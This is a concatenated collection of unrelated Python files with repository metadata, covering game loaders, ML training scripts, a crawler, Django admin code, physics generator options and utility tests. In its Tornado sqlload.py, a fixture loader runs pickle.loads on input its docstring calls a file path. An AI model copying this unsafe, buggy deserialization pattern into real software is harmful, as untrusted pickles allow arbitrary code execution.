self.interiorMusicFilename = 'phase_8/audio/bgm/DG_SZ.mid'
self.battleMusicFile = 'phase_3.5/audio/bgm/encntr_general_bg.mid'
self.invasionMusicFiles = [
'phase_12/audio/bgm/BossBot_CEO_v1.mid',
'phase_9/audio/bgm/encntr_suit_winning.mid']
self.tournamentMusicFiles = [
'phase_3.5/audio/bgm/encntr_nfsmw_bg_1.ogg',
'phase_3.5/audio/bgm/encntr_nfsmw_bg_2.ogg',
'phase_3.5/audio/bgm/encntr_nfsmw_bg_3.ogg',
'phase_3.5/audio/bgm/encntr_nfsmw_bg_4.ogg']
self.bossBattleMusicFile = 'phase_7/audio/bgm/encntr_suit_winning_indoor.mid'
self.dnaFile = 'phase_8/dna/daisys_garden_sz.pdna'
self.szStorageDNAFile = 'phase_8/dna/storage_DG_sz.pdna'
self.szHolidayDNAFile = None
if base.cr.holidayManager.getHoliday() == HolidayType.CHRISTMAS:
self.szHolidayDNAFile = 'phase_8/dna/winter_storage_DG_sz.pdna'
self.telescope = None
self.birdNoises = [
'phase_8/audio/sfx/SZ_DG_bird_01.ogg',
'phase_8/audio/sfx/SZ_DG_bird_02.ogg',
'phase_8/audio/sfx/SZ_DG_bird_03.ogg',
'phase_8/audio/sfx/SZ_DG_bird_04.ogg']
return
def load(self):
SafeZoneLoader.SafeZoneLoader.load(self)
hq = self.geom.find('**/*toon_landmark_hqDG*')
hq.find('**/doorFrameHoleLeft_0').stash()
hq.find('**/doorFrameHoleRight_0').stash()
hq.find('**/doorFrameHoleLeft_1').stash()
hq.find('**/doorFrameHoleRight_1').stash()
|
[
"theclashingfritz@users.noreply.github.com"
] |
theclashingfritz@users.noreply.github.com
|
406903fe9df4ba09c0d193fe84efd2cd76bc4e47
|
4c9e3a963aef1d8f0cea9edc35e3c5ffc64a87d1
|
/tornado-frame/commands/sqlload.py
|
19506d19d86fd44141c5870c37f821fb4d09ba89
|
[] |
no_license
|
hackrole/daily-program
|
d6820d532a9ebb8132676e58da8e2382bd459b8f
|
cff87a09f03ce5bd9e186b0302bead6cd8484ab5
|
refs/heads/master
| 2021-01-21T13:11:55.287908
| 2015-04-21T14:34:36
| 2015-04-21T14:34:36
| 17,940,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 416
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import sys
import cPickle as pickle
from os import path
def load_database(db_session, fixture):
"""
load the database data for the fixtures,
the fixture is a file path
"""
# TODO: the fixture file path controls
# load the fixture
datas = pickle.loads(fixture)
db_session.add_all(datas)
db_session.commit()
print "load database ok"
|
[
"daipeng123456@gmail.com"
] |
daipeng123456@gmail.com
|
ab1003d7efdeb5fc332d4f1e755524aee27b2773
|
8a49aafeea46ded564dd2482350f82b4334436ed
|
/dataloaders/path.py
|
9814116a02c91cdb947275fff256967754e3365b
|
[] |
no_license
|
yifuxiong/Deeplab_pytorch
|
1f96cd69a5597edc2021c24a5b88e462f67cb738
|
530809110156625945dfabd9b6dec0b2c0190415
|
refs/heads/master
| 2022-06-24T19:55:28.687829
| 2019-02-19T08:22:09
| 2019-02-19T08:22:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 523
|
py
|
# -*- coding: utf-8 -*-
"""
@Time : 2019/1/30 19:30
@Author : Wang Xin
@Email : wangxin_buaa@163.com
"""
class Path(object):
@staticmethod
def db_root_dir(database):
if database == 'pascal':
return '/home/data/model/wangxin/VOCdevkit/VOC2012/' # folder that contains VOCdevkit/.
elif database == 'vocaug':
return '/home/data/model/wangxin/VOCAug/'
else:
print('Database {} not available.'.format(database))
raise NotImplementedError
|
[
"wangxin_buaa@163.com"
] |
wangxin_buaa@163.com
|
31be3bffebdfd775abbd2a5ef8f4ee6bdc9cff3c
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/abc010/B/4887036.py
|
ba13d3e730ec5dd09e19a0574b60ad637de85cd5
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
N = int(input())
maisu = list(map(int, input().split()))
ans = 0
for i in maisu:
while (i % 3 == 2 or i % 2 == 0):
if (i % 3 == 2):
ans += 1
i -= 1
if (i % 2 == 0):
ans += 1
i -= 1
print(ans)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
7dc7064cb13f7cbf99bae8290d431be03989ad48
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/380/usersdata/321/76866/submittedfiles/testes.py
|
e60134f230e927dc05748590d538982d937d6895
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
# -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
#ENTRADA
m= float(input('Digite um valor em metros: '))
c= (m*100)
print('%.1f cm' % c)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
ed9770b7effbdb44aa1fcb0abbaef7af6a08b6c7
|
47b40cce73500801c7216d16c3bf8629d8305e8c
|
/tools/tensorpack/examples/ResNet/svhn-resnet.py
|
b22bd115b73ddf6284d6c15c57c06a6e8ad71a16
|
[
"Apache-2.0"
] |
permissive
|
laceyg/ternarynet
|
a19d402a8bf5e54c477f4dd64273b899664a8f17
|
b17744c2aba3aba7e7e72decb3b8a02792d33b54
|
refs/heads/master
| 2020-02-26T14:15:37.507028
| 2017-03-06T18:05:22
| 2017-03-06T18:05:22
| 83,691,489
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,988
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# File: svhn-resnet.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import tensorflow as tf
import argparse
import numpy as np
import os
from tensorpack import *
from tensorpack.tfutils.symbolic_functions import *
from tensorpack.tfutils.summary import *
"""
ResNet-110 for SVHN Digit Classification.
Reach 1.8% validation error after 70 epochs, with 2 TitanX. 2it/s.
You might need to adjust the learning rate schedule when running with 1 GPU.
"""
import imp
cifar_example = imp.load_source('cifar_example',
os.path.join(os.path.dirname(__file__), 'cifar10-resnet.py'))
Model = cifar_example.Model
BATCH_SIZE = 128
def get_data(train_or_test):
isTrain = train_or_test == 'train'
pp_mean = dataset.SVHNDigit.get_per_pixel_mean()
if isTrain:
d1 = dataset.SVHNDigit('train')
d2 = dataset.SVHNDigit('extra')
ds = RandomMixData([d1, d2])
else:
ds = dataset.SVHNDigit('test')
if isTrain:
augmentors = [
imgaug.CenterPaste((40, 40)),
imgaug.Brightness(10),
imgaug.Contrast((0.8,1.2)),
imgaug.GaussianDeform( # this is slow. without it, can only reach 1.9% error
[(0.2, 0.2), (0.2, 0.8), (0.8,0.8), (0.8,0.2)],
(40, 40), 0.2, 3),
imgaug.RandomCrop((32, 32)),
imgaug.MapImage(lambda x: x - pp_mean),
]
else:
augmentors = [
imgaug.MapImage(lambda x: x - pp_mean)
]
ds = AugmentImageComponent(ds, augmentors)
ds = BatchData(ds, 128, remainder=not isTrain)
if isTrain:
ds = PrefetchData(ds, 5, 5)
return ds
def get_config():
logger.auto_set_dir()
# prepare dataset
dataset_train = get_data('train')
step_per_epoch = dataset_train.size()
dataset_test = get_data('test')
lr = get_scalar_var('learning_rate', 0.01, summary=True)
return TrainConfig(
dataset=dataset_train,
optimizer=tf.train.MomentumOptimizer(lr, 0.9),
callbacks=Callbacks([
StatPrinter(),
ModelSaver(),
InferenceRunner(dataset_test,
[ScalarStats('cost'), ClassificationError() ]),
ScheduledHyperParamSetter('learning_rate',
[(1, 0.1), (20, 0.01), (28, 0.001), (50, 0.0001)])
]),
model=Model(n=18),
step_per_epoch=step_per_epoch,
max_epoch=500,
)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
args = parser.parse_args()
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
config = get_config()
if args.load:
config.session_init = SaverRestore(args.load)
if args.gpu:
config.nr_tower = len(args.gpu.split(','))
SyncMultiGPUTrainer(config).train()
|
[
"ppwwyyxxc@gmail.com"
] |
ppwwyyxxc@gmail.com
|
54c140dea6736faad18cb4b357753ab8fe9c78d5
|
0cba5529e387ba0f077b4e8ddeb96f914004f5df
|
/misc/crawl/main.py
|
f61ef4cffc7591cf3323b98f28e84f45b993d08d
|
[
"MIT"
] |
permissive
|
AsyrafAzlan/Malaya
|
dc78398ee6880578f40c5646a48882a5913217ae
|
3d5166173cf74881f7a56fffaaf391813c55d4f1
|
refs/heads/master
| 2021-05-21T22:47:41.863857
| 2020-04-03T15:00:21
| 2020-04-03T15:00:21
| 252,841,526
| 1
| 0
|
MIT
| 2020-04-03T21:04:44
| 2020-04-03T21:04:44
| null |
UTF-8
|
Python
| false
| false
| 1,449
|
py
|
import sys
import argparse
def check_positive(value):
ivalue = int(value)
if ivalue <= 0:
raise argparse.ArgumentTypeError(
'%s is an invalid positive int value' % value
)
return ivalue
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--issue', required = True, help = 'issue to search')
ap.add_argument(
'-s',
'--start',
type = check_positive,
required = True,
help = 'year start to crawl',
)
ap.add_argument(
'-e',
'--end',
type = check_positive,
required = True,
help = 'year end to crawl',
)
ap.add_argument(
'-l',
'--limit',
type = check_positive,
required = True,
help = 'limit of articles to crawl',
)
ap.add_argument(
'-p',
'--sleep',
type = check_positive,
default = 10,
help = 'seconds to sleep for every 10 articles',
)
ap.add_argument(
'-m', '--malaya', default = False, help = 'boolean to use Malaya'
)
args = vars(ap.parse_args())
from core import google_news_run
import json
xgb_model = None
if args['malaya']:
import malaya
xgb_model = malaya.xgb_detect_languages()
results = google_news_run(
args['issue'],
limit = args['limit'],
year_start = args['start'],
year_end = args['end'],
debug = False,
sleep_time_every_ten_articles = args['sleep'],
xgb_model = xgb_model,
)
with open(args['issue'] + '.json', 'w') as fopen:
fopen.write(json.dumps(results))
|
[
"husein.zol05@gmail.com"
] |
husein.zol05@gmail.com
|
d9ff74cab1b9b382b1a78451ee982e6b7ca7fcf1
|
f0316e656767cf505b32c83eef4df13bb9f6b60c
|
/LeetCode/Python/Easy/1603_design_parking_system.py
|
34b0d5713382c201f7ab08da8a4483f7bda44d32
|
[] |
no_license
|
AkshdeepSharma/Classroom
|
70ec46b35fab5fc4a9d2eac430659d7dafba93da
|
4e55799466c101c736de6c7e07d716ff147deb83
|
refs/heads/master
| 2022-06-13T18:14:03.236503
| 2022-05-17T20:16:28
| 2022-05-17T20:16:28
| 94,828,359
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
class ParkingSystem:
def __init__(self, big: int, medium: int, small: int):
self.big = big
self.medium = medium
self.small = small
def addCar(self, carType: int) -> bool:
if carType == 1 and self.big > 0:
self.big -= 1
return True
if carType == 2 and self.medium > 0:
self.medium -= 1
return True
if carType == 3 and self.small > 0:
self.small -= 1
return True
return False
# Your ParkingSystem object will be instantiated and called as such:
# obj = ParkingSystem(big, medium, small)
# param_1 = obj.addCar(carType)
|
[
"akshdeep.sharma1@gmail.com"
] |
akshdeep.sharma1@gmail.com
|
bc85782c3aeb9a7be067f9ec854daf239eaefaa4
|
6f1a0823a28955f0f44fc69862ebd3ab873d79a3
|
/choices/admin.py
|
f9fccb307608bf20ae3e5cc14e4fe20e1799710e
|
[] |
no_license
|
tommydangerous/spadetree
|
69c437c7ea543a2a3906fc60ff223fa1ac16a1d8
|
04a7fcecf2c79db02c1cc2f9de733cf54009836a
|
refs/heads/master
| 2020-05-03T21:43:14.509381
| 2014-10-07T04:27:59
| 2014-10-07T04:27:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 718
|
py
|
from django.contrib import admin
from choices.models import Choice, ChoiceNote
class ChoiceAdmin(admin.ModelAdmin):
list_display = ('pk', 'tutor', 'tutee', 'interest', 'created', 'accepted',
'denied', 'completed', 'date_completed', 'content', 'tutor_viewed',
'tutee_viewed', 'day', 'hour', 'date', 'address', 'city', 'state',)
list_display_links = ('tutee', 'tutor',)
search_fields = ('tutee', 'tutor',)
class ChoiceNoteAdmin(admin.ModelAdmin):
list_display = ('pk', 'user', 'choice', 'content',)
list_display_links = ('pk', 'user',)
search_fields = ('content',)
admin.site.register(Choice, ChoiceAdmin)
admin.site.register(ChoiceNote, ChoiceNoteAdmin)
|
[
"quantumventuress@gmail.com"
] |
quantumventuress@gmail.com
|
c0e3a391ef5b8736bfaa7b0ae24781444cd7257e
|
563274d0bfb720b2d8c4dfe55ce0352928e0fa66
|
/TestProject/src/intellect/examples/rulesfest/BagOfWool.py
|
c81e60f5a0de75ca5d9b3d74d5a8de8012a8f7bf
|
[] |
no_license
|
wangzhengbo1204/Python
|
30488455637ad139abc2f173a0a595ecaf28bcdc
|
63f7488d9df9caf1abec2cab7c59cf5d6358b4d0
|
refs/heads/master
| 2020-05-19T19:48:27.092764
| 2013-05-11T06:49:41
| 2013-05-11T06:49:41
| 6,544,357
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,855
|
py
|
"""
Copyright (c) 2011, Michael Joseph Walsh.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. All advertising materials mentioning features or use of this software
must display the following acknowledgement:
This product includes software developed by the author.
4. Neither the name of the author nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ''AS IS'' AND ANY
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
'''
Created on Aug 29, 2011
@author: Michael Joseph Walsh
'''
class BagOfWool(object):
'''
Used to signify a bag of wool
'''
def __init__(self):
'''
BagsOfWool Initializer
'''
|
[
"wangzhengbo1204@gmail.com"
] |
wangzhengbo1204@gmail.com
|
cd6f6b1ab275a1d882c55fb188d3f83c804fcc16
|
dd25972910fcf2e636034130511f3e90e72279ab
|
/tests/test_utils.py
|
a68203afe83de59ce51e5ff9509f8c42cf3f7963
|
[
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
juju-solutions/jujubigdata
|
730919f25c86e0bca50c4d6e8fc31c08d56c68c8
|
c7a7d68feb6fd5a7661835ac2bcf178a39f3c7f2
|
refs/heads/master
| 2021-05-23T06:19:50.498529
| 2016-05-25T20:50:36
| 2016-05-25T20:50:36
| 35,439,404
| 2
| 6
|
Apache-2.0
| 2021-03-25T21:38:42
| 2015-05-11T17:37:55
|
Python
|
UTF-8
|
Python
| false
| false
| 4,155
|
py
|
#!/usr/bin/env python
# Copyright 2014-2015 Canonical Limited.
#
# This file is part of jujubigdata.
#
# jujubigdata is free software: you can redistribute it and/or modify
# it under the terms of the Apache License version 2.0.
#
# jujubigdata is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
import os
import tempfile
import unittest
import mock
from path import Path
from jujubigdata import utils
class TestError(RuntimeError):
pass
class TestUtils(unittest.TestCase):
def test_disable_firewall(self):
with mock.patch.object(utils, 'check_call') as check_call:
with utils.disable_firewall():
check_call.assert_called_once_with(['ufw', 'disable'])
check_call.assert_called_with(['ufw', 'enable'])
def test_disable_firewall_on_error(self):
with mock.patch.object(utils, 'check_call') as check_call:
try:
with utils.disable_firewall():
check_call.assert_called_once_with(['ufw', 'disable'])
raise TestError()
except TestError:
check_call.assert_called_with(['ufw', 'enable'])
def test_re_edit_in_place(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
tmp_file = Path(filename)
try:
tmp_file.write_text('foo\nbar\nqux')
utils.re_edit_in_place(tmp_file, {
r'oo$': 'OO',
r'a': 'A',
r'^qux$': 'QUX',
})
self.assertEqual(tmp_file.text(), 'fOO\nbAr\nQUX')
finally:
tmp_file.remove()
def test_xmlpropmap_edit_in_place(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
tmp_file = Path(filename)
try:
tmp_file.write_text(
'<?xml version="1.0"?>\n'
'<?xml-stylesheet type="text/xsl" href="configuration.xsl"?>\n'
'\n'
'<!-- Put site-specific property overrides in this file. -->\n'
'\n'
'<configuration>\n'
' <property>\n'
' <name>modify.me</name>\n'
' <value>1</value>\n'
' <description>Property to be modified</description>\n'
' </property>\n'
' <property>\n'
' <name>delete.me</name>\n'
' <value>None</value>\n'
' <description>Property to be removed</description>\n'
' </property>\n'
' <property>\n'
' <name>do.not.modify.me</name>\n'
' <value>0</value>\n'
' <description>Property to *not* be modified</description>\n'
' </property>\n'
'</configuration>')
with utils.xmlpropmap_edit_in_place(tmp_file) as props:
del props['delete.me']
props['modify.me'] = 'one'
props['add.me'] = 'NEW'
self.assertEqual(
tmp_file.text(),
'<?xml version="1.0" ?>\n'
'<configuration>\n'
' <property>\n'
' <name>modify.me</name>\n'
' <value>one</value>\n'
' <description>Property to be modified</description>\n'
' </property>\n'
' <property>\n'
' <name>do.not.modify.me</name>\n'
' <value>0</value>\n'
' <description>Property to *not* be modified</description>\n'
' </property>\n'
' <property>\n'
' <name>add.me</name>\n'
' <value>NEW</value>\n'
' </property>\n'
'</configuration>\n')
finally:
tmp_file.remove()
if __name__ == '__main__':
unittest.main()
|
[
"johnsca@gmail.com"
] |
johnsca@gmail.com
|
b2a162d9f9f162eb8a362eaa7d7226b8ba65b540
|
3ff4da2c4fbbf5310695d96bcf7f06a3fdf6d9f5
|
/Python/Edx_Course/Analytics in Python/Excercises/W4_Practice_2_dictionary_ingredients_preparation.py
|
b01b0498f77363b81daca9df1fba6b6bb27ef2a8
|
[] |
no_license
|
ivanromanv/manuales
|
cab14389161cbd3fb6a5d4e2d4e4851f8d1cda16
|
a296beb5052712ae3f03a3b492003bfc53d5cbba
|
refs/heads/master
| 2018-10-01T01:01:50.166637
| 2018-07-22T18:55:50
| 2018-07-22T18:55:50
| 106,485,581
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,026
|
py
|
# returns a dictionary containing the ingredients and preparation instructions
#
#
def get_recipe_info(recipe_link):
recipe_dict = dict()
import requests
from bs4 import BeautifulSoup
try:
response = requests.get(recipe_link)
if not response.status_code == 200:
return recipe_dict
result_page = BeautifulSoup(response.content,'lxml')
ingredient_list = list()
prep_steps_list = list()
for ingredient in result_page.find_all('li',class_='ingredient'):
ingredient_list.append(ingredient.get_text())
for prep_step in result_page.find_all('li',class_='preparation-step'):
prep_steps_list.append(prep_step.get_text().strip())
recipe_dict['ingredients'] = ingredient_list
recipe_dict['preparation'] = prep_steps_list
return recipe_dict
except:
return recipe_dict
recipe_link = "http://www.epicurious.com" + '/recipes/food/views/spicy-lemongrass-tofu-233844'
get_recipe_info(recipe_link)
|
[
"“ivanromanv@gmail”"
] |
“ivanromanv@gmail”
|
c38d930610a88fbfe78343ed1d9797eee7ac3150
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r8/Gen/DecFiles/options/14165002.py
|
19933c4814bf463ca3508a791d21a537372aaacb
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765
| 2018-12-12T14:41:07
| 2018-12-12T14:41:07
| 185,989,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 815
|
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r8/Gen/DecFiles/options/14165002.py generated: Fri, 27 Mar 2015 15:47:59
#
# Event Type: 14165002
#
# ASCII decay Descriptor: [B_c+ -> ([B_s0]nos -> (D_s- -> K+ K- pi-) pi+, [B_s0]os -> (D_s+ -> K+ K- pi+) pi-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 14165002
Generation().SampleGenerationTool = "Special"
from Configurables import Special
Generation().addTool( Special )
Generation().Special.ProductionTool = "BcVegPyProduction"
Generation().PileUpTool = "FixedLuminosityForRareProcess"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bc_Bspi+_Dspi=BcVegPy,DecProdCut.dec"
Generation().Special.CutTool = "BcDaughtersInLHCb"
|
[
"slavomirastefkova@b2pcx39016.desy.de"
] |
slavomirastefkova@b2pcx39016.desy.de
|
c8602c38456724f4cf0ecdb69a254026ec4a2afc
|
2855f26e603ec7bf5b18876b54b75ee4577bdf2c
|
/bankrecon/migrations/0002_reconciliation_marker.py
|
bc25443b472d1f0c6d6130e214e29d0aa13b7ae3
|
[] |
no_license
|
zkenstein/ppob_multipay_v2
|
e8ea789c395c6fa5b83ba56fbaf5ea08a2a77a14
|
85296f925acf3e94cc371637805d454581391f6e
|
refs/heads/master
| 2022-03-04T13:53:30.893380
| 2019-11-16T22:49:50
| 2019-11-16T22:49:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
# Generated by Django 2.1.5 on 2019-04-16 16:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bankrecon', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='reconciliation',
name='marker',
field=models.TextField(blank=True, max_length=30),
),
]
|
[
"anderi.setiawan@gmail.com"
] |
anderi.setiawan@gmail.com
|
20188e1c1daf1aba8413510e021265f023defa6c
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/ke4FSMdG2XYxbGQny_24.py
|
6930f8ab144bbed9488241d9059899adbcd6d6d4
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
def even_odd_transform(lst, n):
for i in range(len(lst)):
for j in range(n):
if lst[i] %2==0 :
lst[i]-= 2
else :
lst[i]+= 2
return lst
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
521c0123282061359a18e1ed2fb872d8782cea5d
|
2dc12207547c3438421905aee1c506d427e0cbf1
|
/ch17-01-变量作用域.py
|
292464fb81bc78836df82ae8823bc6f238000a73
|
[] |
no_license
|
xmduhan/reading_notes__learning_python
|
8b61ea30be3fb50e1ad49764fcfc8bee8189f48e
|
3526f6b07cb2be799b2baddd7a2e3afef27e7b81
|
refs/heads/master
| 2020-05-17T16:26:23.624423
| 2014-06-15T04:43:38
| 2014-06-15T04:43:38
| 16,638,479
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
# -*- coding: utf-8 -*-
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
变量作用域
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
#%% 可以是直接访问global数据
x = 1
def fun():
print(x) # 读取一个值
fun()
#%% 可以是直接访问global数据
x = 1
def fun():
y = x + 1 # 读取一个值
print 'y =', y
fun()
#%%
x = 1
def fun():
x = 2 # 无法使用x=2,修改全局变量
fun()
print "x =", x
#%%
x = 1
def fun():
global x
x = 2 # 指定了global x,所以x=2,可以修改全局变量
fun()
print 'x =' ,x
#%%
x = 1
def fun():
#import ch17-01 # 由于那个该死的"-"导致无法使用import语句导入模块
import sys
sys.modules['ch17-01']
|
[
"xmduhan@gmail.com"
] |
xmduhan@gmail.com
|
5d8cabc7d618696a371038fb7960237e18f85354
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flasharray/FA_2_17/models/directory_space.py
|
181da14d597c49d1cb1260370a9839af5f77bbba
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972
| 2023-08-25T07:40:41
| 2023-08-25T07:40:41
| 160,391,444
| 18
| 29
|
BSD-2-Clause
| 2023-09-08T09:08:30
| 2018-12-04T17:02:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,530
|
py
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class DirectorySpace(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'space': 'Space',
'time': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'space': 'space',
'time': 'time'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
space=None, # type: models.Space
time=None, # type: int
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A locally unique, system-generated name. The name cannot be modified.
space (Space): Displays size and space consumption information.
time (int): The timestamp of when the data was taken. Measured in milliseconds since the UNIX epoch.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if space is not None:
self.space = space
if time is not None:
self.time = time
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DirectorySpace, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DirectorySpace):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"noreply@github.com"
] |
PureStorage-OpenConnect.noreply@github.com
|
720de787bbd74071e10d2e644a9c055ed7813456
|
d2bb57efe62e1747a6ea2287da5c21fd18bfde02
|
/mayan/apps/documents/tests/test_setting_migrations.py
|
36906893232b807e0b2d006b9a929f1f5f38beb9
|
[
"Apache-2.0"
] |
permissive
|
O2Graphics/Mayan-EDMS
|
1bf602e17a6df014342433827a500863eaed2496
|
e11e6f47240f3c536764be66828dbe6428dceb41
|
refs/heads/master
| 2020-09-28T06:26:39.728748
| 2019-12-09T19:00:33
| 2019-12-09T19:00:33
| 226,711,506
| 0
| 0
|
NOASSERTION
| 2019-12-09T19:00:34
| 2019-12-08T18:21:06
| null |
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
from __future__ import unicode_literals
from django.conf import settings
from django.utils.encoding import force_bytes
from mayan.apps.common.tests.base import BaseTestCase
from mayan.apps.common.tests.mixins import EnvironmentTestCaseMixin
from mayan.apps.smart_settings.classes import Setting
